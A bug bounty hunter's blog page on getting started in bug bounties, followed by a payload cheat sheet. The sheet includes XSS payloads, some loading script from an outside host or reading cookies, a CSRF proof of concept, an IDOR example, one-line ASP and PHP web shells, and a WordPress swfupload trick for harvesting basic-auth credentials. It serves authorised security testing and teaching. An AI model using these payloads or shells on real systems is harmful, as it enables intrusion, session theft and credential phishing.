Kevin Roh bio photo

Kevin Roh

Security Analyst @ Synack | Bug Bounty Participant

Email Twitter Github

Contents of this blog will continue to change over time meaning information may be added or removed without any notice.

Background

My first vulnerability was submitted to Uber on October 13, 2015. I joined the Synack Red Team (SRT) in January 2017 and shortly afterwards in June 2017 I joined Synack as a Security Analyst.

Bug Bounty Programs

Bug bounty programs are setup by companies who want security researchers to look for vulnerabilities on their assets (web and/or mobile application, APIs, etc). Some bug bounties are responsible disclosure only programs but many others will give you a reward for finding vulnerabilities and reporting them. There are platforms out there such as Synack, HackerOne, and BugCrowd. Keep in mind for Synack you need to go through a vetting process; interview, assessment, and background check, to be able to join but it is well worth it since reports are usually reviewed and paid out within 24 hours of submission.

Teaching Yourself

Blogs, HackerOne Hacktivity, and Web Hacking 101 by Pete Yaworski have always been my go to places to learn more about vulnerabilities out there. The HackerOne Hacktivity page contains so much useful information from all the disclosed reports and by being able to go through most of them you can get an idea of each vulnerability out there. You can use the same method as the person in the disclosed report or better yet combine your method and their method together to find a vulnerability. This is how you start to learn and develop your knowledge base.

Blogs

You can view more blogs at: HackerOne - Hacker Blogs We Love Reading

Web Hacking Pro Tips

Reading Material

Tools

Vulnerable Websites

Vulnerabilities & Payloads

In this section it will continue to change but I will be providing different type of payloads you can use for different type of vulnerabilities.

Cross-site Scripting (XSS)

OWASP 2013 Top 10 - XSS

You can use the payload: https://unlvcsec.herokuapp.com/#/search?q=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E to execute an alert which demonstrates XSS. This will also demonstrate access to the DOM and should be shown instead of only using alert(1).

There will always be different type of scenarios and you’ll have to use a different payload for each one. Here are a couple of examples:

  • "><img src=x onerror=alert(document.domain)>
  • </script><script>alert(document.domain)>
  • <script src=//0q.pe>
  • <iframe src=//0q.pe>
  • data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ+
  • javascript:alert(document.domain) Click here
  • javascript:alert(document.cookie) Click here

You can also use a useful tool called XSSHunter which can be used to take your XSS to a whole new level.

Cross-site Request Forgery (CSRF)

OWASP 2013 Top 10 - CSRF

CSRF will allow an attacker to perform a sensitive action on another users account without their consent if the victim visits a website or a link if the website does not provide CSRF protection such as a CSRF token or Authorization header.

You can easily create a CSRF proof of concept by getting the request and right click -> Engagement Tools -> Generate CSRF PoC

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://0q.pe" method="POST" target="_blank">
<input type="hidden" name="first_name" value="test" />
<input type="hidden" name="last_name" value="test" />
<input type="hidden" name="email" value="test@test.com" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

There will also be situations where the request will contain JSON and a regular CSRF proof of concept will not work.

Insecure Direct Object Reference (IDOR)

Insecure Direct Object References occur when an application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access resources in the system directly, for example database records or files.

For example, the follow HTTP request contains the parameter article_id in the body and when you change the id from 42872820 to 42872819 you are able to rate the transaction for another user.

POST /goods/index/rateme/ HTTP/1.1
Host: www.0q.pe
Connection: close
Content-Length: 54
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://www.0q.pe
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Language: en-US,en;q=0.8,es;q=0.6

article_id=42872820&rating=1&comment=Worked+perfectly!

Command Injection

If you have able to find a file upload location which reveals where your file is being saved and you’re able to access it you can try achieving command injection.

ASP
http://0q.pe/test.asp?cmd=net%20user

<%
dim outp

Set wShell1 = CreateObject("WScript.Shell")
Set cmd1 = wShell1.Exec("%comspec% /c " & Request.QueryString("cmd"))
outp = cmd1.StdOut.Readall()
response.write(outp)

set outp=nothing
set cmd1 = nothing
set wShell1 = nothing
%>

PHP
http://0q.pe/test.php?cmd=ls

<?php
system($_GET['cmd']);
?>

WordPress Vulnerabilities

There are a couple of programs which will accept these WordPress endpoints which reveal users and an swf which allows 401 basic auth attacks.

When the WordPress instance still contains the swfupload.swf you can go to

/wp-includes/js/swfupload/swfupload.swf?debugEn%xabled=true&buttonImag%xeURL=http://45.33.46.103/

http://45.33.46.103 is password protected. To create a directory that is password protected you can do the following command in your webserver which will create a .htpasswd file.

htpasswd -c /var/www/domain.com/public_html/.htpasswd user1

And creating a .htaccess in the directory you would like to protect.

AuthName "Restricted Area"
AuthType Basic
AuthUserFile /var/www/domain.com/htdocs/.mycustompasswordfile
AuthGroupFile /dev/null
require valid-user

The follow endpoints allow you to possibly recover usernames on the WordPress instance.

/wp-json/wp/v2/users
/wp-json/oembed/1.0/embed?url=
/wp/?rest_route=/wp/v2/users

These endpoints will allow you to obtain the users registered in the WordPress instance.